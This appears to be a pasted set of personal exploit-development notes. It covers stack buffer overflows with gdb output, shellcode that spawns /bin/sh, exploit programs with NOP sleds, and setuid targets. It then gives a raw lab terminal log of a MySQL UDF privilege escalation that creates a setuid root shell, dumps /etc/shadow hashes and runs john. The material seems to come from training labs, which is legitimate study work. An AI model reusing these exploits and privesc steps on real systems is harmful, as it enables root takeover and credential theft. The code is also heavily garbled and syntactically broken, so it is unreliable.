· 4 years ago · Feb 06, 2021, 10:58 AM
1
2#include <string.h>
3
4int main ()
5{
6
7 int array[5];
8 int i;
9
10 for (i= 0; i <= 255; i++ )
11 {
12
13 array[i] = 10;
14
15 }
16}
17
18
19
20push 1 {data}
21push addr var {variable}
22ESP <points to the top of the stack>
23pop < retrieving information
24pop eax
25pop ebx
26load the value where esp is pointing into eax
27pop doesnt change the value of esp or overwrite pop writes data to the operand var to eax then the value 1 into ebx
28
29mov eax, [ebp+10h]
30dword 16 [10 in hex] into eax {grows towards low numbered addresses in eax
31
32
33
34functions
35
36
37
38void function( int a, int b)
39{
40
41 int array[5];
42
43 }
44
45 main()
46
47 }
48 function(1,2);
49
50 printf("this is where the ret address points");
51
52 }
53
54
55
56
57 [Low MEMROY]
58 [ Array ]
59 [EBP]
60 [RET]
61 [A]
62 [B]
63 [ HIGH MEMROY]
64------------------------------------------
65*compiling output of compiler for debugging*
66
67test@test.org:~/ cc -mprefered-stack-boundary=2 ggdb function.c -o function
68
69*setup dword size increments *
70
71test@test.org:~/ gdb function
72*look at first function in main*
73
74(gdb) disas main
75
76Dump of assembler code for function main:
770x080483c <main+0: push %ebp,
780x80483d <main+1>: move %esp, %ebp
790x804838f <main+3>: sub $0x8, %esp%
800x8043892 <main+6>: mov1 $0x2, 0x4(%esp)
810x804839a <main+14>: mov1 %0x1, (%esp)
820x8043a1 <main+21>: call 0x8048384 <function>
830x8048a6 <main+26>: mov 1 $0x8048500, (%esp)
840x80483ad <main+33>: call 0x80482b0 <_init+56>
850x80483b2 <main+38>: leave
860x80483b3 <main+39>: ret
87End of assembler dump.
88
89
90<main+6 and <main+14> 2 params (ox1 and 0x2) pushed backwards onto the stack and <main+21> is doing a call instruction to ret eip onto the stack, call transfers flow of execution to function 0x8048384
91
92(gdb) disas function
93DUmp of assembler for <function> function
94
950x8048384 <function+0>: push %ebp
960x8048385 <function+1>: mov %esp, %ebp
970x8048387 <function+3> sub $0x20, %esp
980x804838a <function+6>: leave
99End of assembler dump
100
101function setups a local variable array to control main cocurrent frame pointer into ebp then copies pointer into ebp at <function+1> then creates enough space for our location variable, array at <function+3> "array" is 5 *4 =2
102(20 bytes) the stack allocates 0x20 for 30 bytes
103
104*creates function that reads from user input into a buffer using <stdio.h>
105
106
107
108void return_input (void)
109{
110
111 char array[30];
112
113 gets (array);
114 printf("%s\n", array);
115
116}
117
118main()
119{
120 return_input();
121
122 return ();
123
124 }
125
126*allows user to put unlimited elements into arrays randomly
127*disable stack protection*
128
129test@test.org:/ cc -mpreferrred-stack-boundary=2 -ggdb code.c -o code
130
131gdb ./durp
132
133disas return input
134we can see two call instructions for gets(0 and printf()
135(gdb) break *0x80483d0
136Breakpoint 1 at 0x80483d0: file durp.c line 5.
137(gdb) break *0x080483d0:
138Breakpoint2 at 0x80483e9: file dupr.c line 7.
139(gdb) run
140
141Breaking 1, 0x080483d0
142(gdb) disas main
143(gdb) continue
144
145AAAAAAAAAAAAABBBBBBBBBBCCCCDDDDDDDDDDDDDDD
146Breakpoint2, 0x80483e9 in return_input () at durp
147
148(gdb) x20x 0xbffffa98
149*hit our second breakpoint the return instruction in return_input(), before the functions returns
150
151*we overwriten the stack with 0x4444444 lets try to execute the ret instruction*
152
153(gdb) x/1i $eip0x80483e9 <return_input+37>: ret
154(gdb) stepi
1550x4444444 in ?? ()
156*we're executing code and address that was intendted for our strings, the array is overflowed*
157
158[ LOW MEMORY]
159[AAAAAAAAAAAAABBBBBBBBBBCCCCDDDDDDDDDDDDDDD] 30 CHARS +2 OF padding
160[DDDD] EBP
161[DDDD] RETURN ADDRESS
162[HIGH MEMORY BOTTOM OF STACK]
163
164*filled and array[32] wrote stored address of EBP which contains the dword hexadacimal DDDD we skipped the RET with another dword of DDDD the function exited it read the value stored in RET which is now our 0x4444444,
165*we got a segfault the kernel dumped*
166
167(we control EIP)
168overflowed a buffer into EBP and RET with a stored valued loaded into EIP to crash the program controlling a path of execution into EIP the instruction pointer *when RET is read and placed into EIP the instruiction at the address will the executed thats how we control the flow of execution)
169
170having a program call return_input
171*determined address to jump to*
172(gdb) disas main
173Dump of assembler code for function main:
174
175(gdb) disas main
176Dump of assembler code for function main:
177
1780x080483ea <main+0>: push %ebp
1790x080483eb <main+1>: mov %esp,%ebp
1800x080483ed <main+3>: call 0x80483c4 <return_input
1810x080483f2 <main+8>: mov $0x0,%eax
1820x080483f7 <main+13>: pop %ebp
1830x080483f8 <main+14>: ret
184End of assembler dump.
185
1860x080483ed <- address we want to use
187*find a method to turn ascii code into character input*
188
189test@test.org:~/ printf "AAAAAAAAAABBBBBBBBBBCCCCDDDDDDDDDDDDDDD" | ./durp
190
191*now we overwrite the saved return address of the call to return_input()
192
193test@test.org:~ printf "AAAAAAAAAAAAABBBBBBBBBBCCCCDDDDDDDDDDDDDDD\xed\x83\x04\x08" | ./durp
194AAAAAAAAAAAAABBBBBBBBBBCCCCDDDDDDDDDDDDDDd
195AAAAAAAAAAAAABBBBBBBBBBCCCCDDDDDDDDDDDDDDe
196^returns string twice
197
198
199//serialkey.c
200
201#include <stdlib.h>
202#include <stdio.h>
203#include <string.h>
204
205int valid_serial( char *psz )
206{
207 size_t len + strlen( psz );
208 unsigned total = 0;
209 size_t i;
210
211 if( len < 10 )
212 return 0;
213
214 for( i = 0 ; i < len; i++ )
215 {
216
217 if(( psz[i] < '0' ) || ( psz[i] > 'z' ))
218 return 0;
219
220 total +=psz[i];
221 }
222
223 if( total % 853 == 83 )
224 return 1;
225
226 return 0;
227
228 }
229
230 int validate_serial()
231 {
232
233 char serial[ 24 ];
234
235 fscanf( stdin, "%s" , serial );
236 return 1;
237
238 else
239 return 0;
240
241 }
242
243 int do_valid_stuff()
244 {
245
246 printf(the serial is legit!\n");
247 // do serial-restricted, valid stuff here.
248 exit( 0 );
249
250 }
251
252 int do_invalid_stuff()
253 {
254 printf("wrong serial number!\nExiting\n");
255 exit ( 1 );
256
257 }
258
259 int main( int argc, char *argv[] )
260 {
261
262 if( validate_serial() )
263 do_valid_stuff(); //0x0804863c
264 else
265 do_invalid_stuff();
266
267 return 0;
268 }
269
270 *spawning a rootshell*
271
272 //shell.call
273 int main(){
274 char *name[2];
275
276 name[0] = "/bin/sh";
277 name[1] = 0x0;
278 execve(name[0], name, 0x0);
279 exit(0);
280 }
281
282 // shellcode.cchar shellcode[] = “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
283
284
285 int main()
286 {
287
288 int *ret;
289 ret = (int *)&ret +2;
290 (*ret) = (int)shellcode;
291 }
292
293 *finding the first adress of ESP
294 // find_start.c
295 unsigned long find_start(void)
296 {
297 __asm__(*mov1 %esp, %eax");
298 }
299 int main()
300 {
301 printf("0x%x\n"find_start());
302 }
303 test@test.org:~/ ./find_start
304 0xbffffad8
305
306 *this program takes command line input into an array with no bounds checking needs to be owned by root in suid
307 sudo chown root lamer
308 sudo chmod +s lamer
309 ./lamer+shellcode+padding+choice of saved return address
310 *find the offset of a string that overwrites the return address, *512
311 ./lamer $(printf "foo"
312
313 *print out nullbytes*
314
315 test@test.org:~/ printf %020x"
316 000000000000000
317
318 we use this time to guess the offset of the saved return vulnerable program:
319
320 ./lamer $printf "%0512x" 0)
321 ./lamer $printf "%0516x" 0)
322 ./lamer $print "%0520x" 0)
323 ./lamer $printf "%0524x" 0)
324 Segfault
325
326 ./victin $(printf "%0528x" 0)
327 Segfault
328 so our shellcode is 40 bytes, and we have 480-484 for padding
329 ./victim $printf"“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0480x\xd8\xfa\xff\xbf”)
330
331 shellcode is at the start of our strong next to %0480x and 4 bytes for saved return address
332 *changing padding to 484 bytes*
333 Illegal instruction
334
335 *guesses the offset between the start and first instruction in shellcode *
336
337 #include <stdlib.h>
338
339 #define offset_size 0
340 #define buffer_size 512
341
342 char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
343
344 unsigned long find_start(void) {
345 __asm__(*mov1 %esp,%eax");
346 }
347
348 int main(int argc, char *argv[])
349 {
350 char *buff, *ptr;
351 long *addr_ptr, addr;
352 int offset=offset_size, bsize=buffer_size;
353 int i;
354
355 if (argc > 1) bsize = atoi(argv[1]);
356 if (argc > 2) offset = atoi(argv[2]):
357
358 addr = find_start() - offset;
359 printf("attempting address: 0x%x\n",addr);
360 ptr =buff;
361 addr_ptr =(long *) ptr;
362 for (i =0; i < bsize; i+=4)
363 *(addr_ptr++) =addr;
364
365 ptr += 4;
366
367 for (i = 0; i < strlen(sc); i++)
368
369 *(ptr++) = sc[i];
370
371 buff[bsize -1] = '\0';
372
373 memcpy(buff,"BUF=",4);
374 putenv(buff);
375 system("/bin/bash");
376 }
377 b00m r00t
378
379
380 *NOPs*
381
382 #include <stdlib.h>
383
384 #define DEFAULT_OFFSET 0
385 #define DEFAULT_BUFFER_SIZE 512
386 #define NOP x90
387
388 char shellcode[] =
389 “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
390
391 unsigned long get_sp(void) {
392 __asm__("mov1 %esp,%eax");
393
394 void main(int argc, char *argv[])
395 {
396
397 char *buff, *ptr;
398 long *add_ptr, addr;
399 int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
400 int i;
401
402 if (argc > 1) bsize = atoi(argv[1]);
403 if (argc > 2) offset = atoi(argv[2]);
404
405 if (!(buff = malloc(bsize))) {
406 printf("can't allocate memory.\n");
407 exit(0);
408 }
409 addr = get_sp() - offset;
410 printf"Using address: 0x%x\n", addr);
411
412 ptr = buff;
413 addr_ptr = (long * ptr;
414 for (i = 0; i < bsize; i+=4)
415 *(addr_ptr++) = addr;
416
417 for (i = 0; i <bsize/2; i++)
418 buff[i] = NOP;
419
420 ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
421 for (i = 0; < strlen(shellcode) ; i++)
422 *(ptr++) = shellcode[i];
423
424 buff[bsize - 1] = '\0';
425 putenv(buff);
426 system("/bin/bash");
427 }
428
429
430
431 //shell.c
432int main() {
433 char *name[2];
434
435 name[0] = "/bin/sh";
436 name[1] = 0x0;
437 execve(name[0], name, 0x0);
438 exit (0);
439 }
440
441
442//shellcode.c
443char shellcode[] =
444“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
445
446int main()
447{
448
449 int = (int *)&ret +2;
450 (*ret) = (int)shellcode;
451
452}
453
454[ask application to force input, causing the address we supplised to be loaded into EP
455,we overwrite the first instruction in the “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
456
457when RET is popped off the stack and loaded into EIP the first instruction is executed of the shellcode
458
459
460Location pointer
461
462// find_start.c
463unsigned long find_start(void)
464{
465
466 __asm__("move1 %esp, %eax");
467
468}
469
470int main()
471{
472
473 printf("0x%n\n",find_start());
474}
475
476[putting programs into arranys with no bounds checking ]
477 [has to be owned by root in suid]
478
479sudo chown root victim
480sudo chmod +s victim
481
482./victim <shellcode>padding>choice-of-returnaddress
483
484./victim “\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68” + printf "%020x"
485
486./victim $(printf "%0512x" 0)
487./victim $(printf %0516x" 0)
488./victim $(printf %0520x" 0)
489./victim $(printf %0524x" 0)
490Segfault
491./victim $(printf %0528x" 0)
492Segfault
493[we can tell the saved return address is probably 524-528 bytes
494shellcode = [40]
495padding = [480]
496saved ret address [0xbffffad8]
497
498./victim $(printf" \xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0480x\xd8\xfa\xff\xbf”)
499[shellcode is at the start of the %s next is %0480x [4]bytes is dword for return address
500
501[little indian]
502
503./victim $(printf“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68%0484x\xd8\xfa\xff\xbf”)
504Illegal instruction
505
5068%0484x\x38\xfa\xff\xbf")
507
508[program to guess offset between start of the program and first instruction for shellcode]
509
510#include <stdlib.h>
511
512#define offset_size 0
513#define buffer_size 512
514
515
516char sc[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
517
518unsigned long find_start(void) {
519
520 __asm__(*mov1 %esp,%eax");
521
522}
523
524int main(int argc, char *argv[])
525{
526
527 char *buff, *ptr;
528 long *addr_ptr, addr;
529 int offset=offset_size, bsize=buffer_size;
530 int i;
531
532 if (argc > 1) bsize = atoi(argv[1]);
533 if (argc > 2) offset = atoi(argv[2]);
534
535 addr = find_start() - offset;
536 printf("attempt address: 0x%n\n",addr);
537
538 ptr = buff;
539 addr_ptr =(long *) ptr;
540 for (i - 0; i < bsize; i+=4)
541 * (addr_ptr++) = addr;
542
543 ptr +=4;
544
545 for (i = 0; i < strlen(sc); i++)
546 *(ptr++) = sc[i];
547
548 buff[bsize - 1] = '\0';
549
550 memcpy(buff, "BUF=",4);
551 putenv(buff);
552 system(" /bin/bash");
553
554}
555
556
557[NOP]
558
559
560
561#include <stdlib.h>
562
563#define DEFAULT_OFFSET 0
564#define DEFAULT_BUFFER_SIZE 512
565#define NOP 0x90
566
567
568 char shellcode[] = char sc[] =“\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46”“\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd
569\x80\xe8\xe1”“\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68”;
570
571unsigned long get_sp(void) {
572 __asm__("mov1 %esp,%eax");
573}
574
575void main(int argc, char *argv[])
576
577{
578$ ssh user@10.10.170.166
579$ 6 22 [-E log_file] user@10.10.170.166's configfile] [-I pkcs11]
580password:
581Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
582
583The programs included with the Debian GNU/Linux system are free software;
584the exact distribution terms for each program are described in the
585individual files in /usr/share/doc/*/copyright.
586
587Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
588permitted by applicable law.
589Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
590user@debian:~$ id
591uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plug
592dev)
593user@debian:~$ ls
594myvpn.ovpn tools
595user@debian:~$ cd tools/
596user@debian:~/tools$ ls
597kernel-exploits mysql-udf nginx privesc-scripts sudo suid
598user@debian:~/tools$ cd mysql-udf/
599user@debian:~/tools/mysql-udf$ ls
600raptor_udf2.c
601user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
602user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o raptor_udf2.so raptor_udf2
603.o -lc
604top - 20:04:48 up 11 min, 1 user, load average: 0.00, 0.07, 0.08
605Tasks: 83 total, 1 running, 82 sleeping, 0 stopped, 0 zombie
606Cpu(s): 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
607Mem: 507168k total, 498240k used, 8928k free, 382220k buffers
608Swap: 901112k total, 0k used, 901112k free, 54236k cached
609
610 PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
611 1 root 20 0 8396 812 680 S 0.0 0.2 0:01.06 init
612 2 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kthreadd
613 3 root RT 0 0 0 0 S 0.0 0.0 0:00.00 migration/0
614 4 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ksoftirqd/0
615 5 root RT 0 0 0 0 S 0.0 0.0 0:00.00 watchdog/0
616 6 root 20 0 0 0 0 S 0.0 0.0 0:00.01 events/0
617 7 root 20 0 0 0 0 S 0.0 0.0 0:00.00 cpuset
618 8 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khelper
619 9 root 20 0 0 0 0 S 0.0 0.0 0:00.00 netns
620 10 root 20 0 0 0 0 S 0.0 0.0 0:00.00 async/mgr
621 11 root 20 0 0 0 0 S 0.0 0.0 0:00.00 pm
622 12 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenwatch
623 13 root 20 0 0 0 0 S 0.0 0.0 0:00.00 xenbus
624 14 root 20 0 0 0 0 S 0.0 0.0 0:00.00 sync_supers
625 15 root 20 0 0 0 0 S 0.0 0.0 0:00.00 bdi-default
626 16 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kintegrityd/0
627 17 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kblockd/0
628 18 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpid
629 19 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_notify
630 20 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kacpi_hotplug
631 21 root 20 0 0 0 0 S 0.0 0.0 0:00.06 kseriod
632 23 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kondemand/0
633 24 root 20 0 0 0 0 S 0.0 0.0 0:00.00 khungtaskd
634 25 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kswapd0
635 26 root 25 5 0 0 0 S 0.0 0.0 0:00.00 ksmd
636 27 root 20 0 0 0 0 S 0.0 0.0 0:00.00 aio/0
637 28 root 20 0 0 0 0 S 0.0 0.0 0:00.00 crypto/0
638 165 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata/0
639 166 root 20 0 0 0 0 S 0.0 0.0 0:00.00 ata_aux
640 167 root 20 0 0 0 0 S 0.0 0.0 0:00.00 scsi_eh_0
641 168 root 20 0 0 0 0 S 0.0 0.0 0:00.01 scsi_eh_1
642 198 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kjournald
643 240 root 20 0 0 0 0 S 0.0 0.0 0:00.00 flush-202:0
644 275 root 16 -4 16784 796 380 S 0.0 0.2 0:00.34 udevd
645 425 root 20 0 0 0 0 S 0.0 0.0 0:00.00 kpsmoused
646 932 root 18 -2 16780 720 308 S 0.0 0.1 0:00.00 udevd
647 933 root 18 -2 16780 648 236 S 0.0 0.1 0:00.00 udevd
648 1249 root 20 0 6796 756 284 S 0.0 0.1 0:00.03 dhclient
649 1279 daemon 20 0 8136 532 408 S 0.0 0.1 0:00.00 portmap
650 1311 statd 20 0 14424 896 732 S 0.0 0.2 0:00.00 rpc.statd
651 1314 root 20 0 0 0 0 S 0.0 0.0 0:00.00 rpciod/0
652 1316 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd000
653 1317 root 15 -5 0 0 0 S 0.0 0.0 0:00.00 kslowd001
654 1318 root 20 0 0 0 0 S 0.0 0.0 0:00.00 nfsiod
655 1325 root 20 0 27064 588 372 S 0.0 0.1 0:00.00 rpc.idmapd
656 1562 root 20 0 54336 1656 1084 S 0.0 0.3 0:00.08 rsyslogd
657 1638 root 20 0 3960 644 504 S 0.0 0.1 0:00.00 acpid
658 1672 root 20 0 71424 2896 1476 S 0.0 0.6 0:00.01 apache2
659 1675 www-data 20 0 71156 1992 596 S 0.0 0.4 0:00.00 apache2
660 1676 www-data 20 0 287m 2628 984 S 0.0 0.5 0:00.00 apache2
661 1677 www-data 20 0 287m 2644 996 S 0.0 0.5 0:00.00 apache2
662 1818 root 20 0 22468 1068 824 S 0.0 0.2 0:00.00 cron
663user@debian:~/tools/mysql-udf$ use mysql;
664-bash: use: command not found
665user@debian:~/tools/mysql-udf$ mysql -u root
666Welcome to the MySQL monitor. Commands end with ; or \g.
667Your MySQL connection id is 36
668Server version: 5.1.73-1+deb6u1 (Debian)
669
670Copyright (c) 2000, 2013, Oracle and/or its affiliates. All rights reserved.
671
672Oracle is a registered trademark of Oracle Corporation and/or its
673affiliates. Other names may be trademarks of their respective
674owners.
675
676Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
677
678mysql> use mysql;
679Reading table information for completion of table and column names
680You can turn off this feature to get a quicker startup with -A
681
682Database changed
683mysql> create table foo(line blob);
684Query OK, 0 rows affected (0.00 sec)
685
686mysql> insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
687Query OK, 1 row affected (0.00 sec)
688
689mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
690Query OK, 1 row affected (0.00 sec)
691
692mysql> create function do_system returns integer soname 'raptor_udf2.so';
693Query OK, 0 rows affected (0.00 sec)
694
695mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
696+------------------------------------------------------------------+
697| do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') |
698+------------------------------------------------------------------+
699| 0 |
700+------------------------------------------------------------------+
7011 row in set (0.00 sec)
702
703mysql> /q
704 -> exit
705 -> /quit
706 -> ^CCtrl-C -- exit!
707Aborted
708user@debian:~/tools/mysql-udf$ /tmp/rootbash -p
709rootbash-4.1# id
710uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30
711(dip),44(video),46(plugdev),1000(user)
712rootbash-4.1# cat /etc/shadow
713root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
71417298:0:99999:7:::
715daemon:*:17298:0:99999:7:::
716bin:*:17298:0:99999:7:::
717sys:*:17298:0:99999:7:::
718sync:*:17298:0:99999:7:::
719games:*:17298:0:99999:7:::
720man:*:17298:0:99999:7:::
721lp:*:17298:0:99999:7:::
722mail:*:17298:0:99999:7:::
723news:*:17298:0:99999:7:::
724uucp:*:17298:0:99999:7:::
725proxy:*:17298:0:99999:7:::
726www-data:*:17298:0:99999:7:::
727backup:*:17298:0:99999:7:::
728list:*:17298:0:99999:7:::
729irc:*:17298:0:99999:7:::
730gnats:*:17298:0:99999:7:::
731nobody:*:17298:0:99999:7:::
732libuuid:!:17298:0:99999:7:::
733Debian-exim:!:17298:0:99999:7:::
734sshd:*:17298:0:99999:7:::
735user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
73617298:0:99999:7:::
737statd:*:17299:0:99999:7:::
738mysql:!:18133:0:99999:7:::
739rootbash-4.1# cat /etc/passwd
740root:x:0:0:root:/root:/bin/bash
741daemon:x:1:1:daemon:/usr/sbin:/bin/sh
742bin:x:2:2:bin:/bin:/bin/sh
743sys:x:3:3:sys:/dev:/bin/sh
744sync:x:4:65534:sync:/bin:/bin/sync
745games:x:5:60:games:/usr/games:/bin/sh
746man:x:6:12:man:/var/cache/man:/bin/sh
747lp:x:7:7:lp:/var/spool/lpd:/bin/sh
748mail:x:8:8:mail:/var/mail:/bin/sh
749news:x:9:9:news:/var/spool/news:/bin/sh
750uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
751proxy:x:13:13:proxy:/bin:/bin/sh
752www-data:x:33:33:www-data:/var/www:/bin/sh
753backup:x:34:34:backup:/var/backups:/bin/sh
754list:x:38:38:Mailing List Manager:/var/list:/bin/sh
755irc:x:39:39:ircd:/var/run/ircd:/bin/sh
756gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
757nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
758libuuid:x:100:101::/var/lib/libuuid:/bin/sh
759Debian-exim:x:101:103::/var/spool/exim4:/bin/false
760sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
761user:x:1000:1000:user,,,:/home/user:/bin/bash
762statd:x:103:65534::/var/lib/nfs:/bin/false
763mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
764rootbash-4.1# cat /etc/hosts
765127.0.0.1 localhost
766127.0.1.1 debian.localdomain debian
767
768# The following lines are desirable for IPv6 capable hosts
769::1 ip6-localhost ip6-loopback
770fe00::0 ip6-localnet
771ff00::0 ip6-mcastprefix
772ff02::1 ip6-allnodes
773ff02::2 ip6-allrouters
774rootbash-4.1# ls -l /etc/shadow
775-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
776rootbash-4.1# cat /etc/shadow
777root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:
77817298:0:99999:7:::
779daemon:*:17298:0:99999:7:::
780bin:*:17298:0:99999:7:::
781sys:*:17298:0:99999:7:::
782sync:*:17298:0:99999:7:::
783games:*:17298:0:99999:7:::
784man:*:17298:0:99999:7:::
785lp:*:17298:0:99999:7:::
786mail:*:17298:0:99999:7:::
787news:*:17298:0:99999:7:::
788uucp:*:17298:0:99999:7:::
789proxy:*:17298:0:99999:7:::
790www-data:*:17298:0:99999:7:::
791backup:*:17298:0:99999:7:::
792list:*:17298:0:99999:7:::
793irc:*:17298:0:99999:7:::
794gnats:*:17298:0:99999:7:::
795nobody:*:17298:0:99999:7:::
796libuuid:!:17298:0:99999:7:::
797Debian-exim:!:17298:0:99999:7:::
798sshd:*:17298:0:99999:7:::
799user:$6$M1tQjkeb$M1A/ArH4JeyF1zBJPLQ.TZQR1locUlz0wIZsoY6aDOZRFrYirKDW5IJy32FBGjwYpT2O1zrR2xTROv7wRIkF8.:
80017298:0:99999:7:::
801statd:*:17299:0:99999:7:::
802mysql:!:18133:0:99999:7:::
803rootbash-4.1# wget
804wget: missing URL
805Usage: wget [OPTION]... [URL]...
806
807Try ‘wget --help’ for more options.
808rootbash-4.1# pwd
809/home/user/tools/mysql-udf
810rootbash-4.1# ls
811raptor_udf2.c raptor_udf2.o raptor_udf2.so
812rootbash-4.1# cd ..
813rootbash-4.1# ls
814kernel-exploits mysql-udf nginx privesc-scripts sudo suid
815rootbash-4.1# cd ..
816rootbash-4.1# ls
817myvpn.ovpn tools
818rootbash-4.1# cd tools/
819rootbash-4.1# ls
820kernel-exploits mysql-udf nginx privesc-scripts sudo suid
821rootbash-4.1# cd privesc-scripts/
822rootbash-4.1# ls
823LinEnum.sh linpeas.sh lse.sh
824rootbash-4.1# john --wordlist =/usr/share/wordlists/rockyou.txt hash.txt
825login as: user
826user@10.10.170.166's password:
827Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
828
829The programs included with the Debian GNU/Linux system are free software;
830the exact distribution terms for each program are described in the
831individual files in /usr/share/doc/*/copyright.
832
833Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
834permitted by applicable law.
835Last login: Sun Jan 17 21:12:02 2021 from ip-10-9-252-16.eu-west-1.compute.inter nal
836user@debian:~$ cd /home/user/tools/mysql.udf
837-bash: cd: /home/user/tools/mysql.udf: No such file or directory
838user@debian:~$ ls
839myvpn.ovpn tools
840user@debian:~$ cd tools/
841user@debian:~/tools$ ls
842kernel-exploits mysql-udf nginx privesc-scripts sudo suid
843user@debian:~/tools$ gcc -g -c raptor_udf2.c -fPIC
844gcc: raptor_udf2.c: No such file or directory
845gcc: no input files
846user@debian:~/tools$ cd mysql-udf/
847user@debian:~/tools/mysql-udf$ gcc -g -c raptor_udf2.c -fPIC
848user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -1c
849gcc: unrecognized option '-soname,'
850gcc: unrecognized option '-1c'
851user@debian:~/tools/mysql-udf$ gcc -g -shared -W1, -soname, raptor_udf2.so -o re aptor_udf2.so raptor_udf2.o -lc
852gcc: unrecognized option '-soname,'
853user@debian:~/tools/mysql-udf$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o rapt or_udf2.so raptor_udf2.o -lc
854user@debian:~/tools/mysql-udf$ mysql -u root
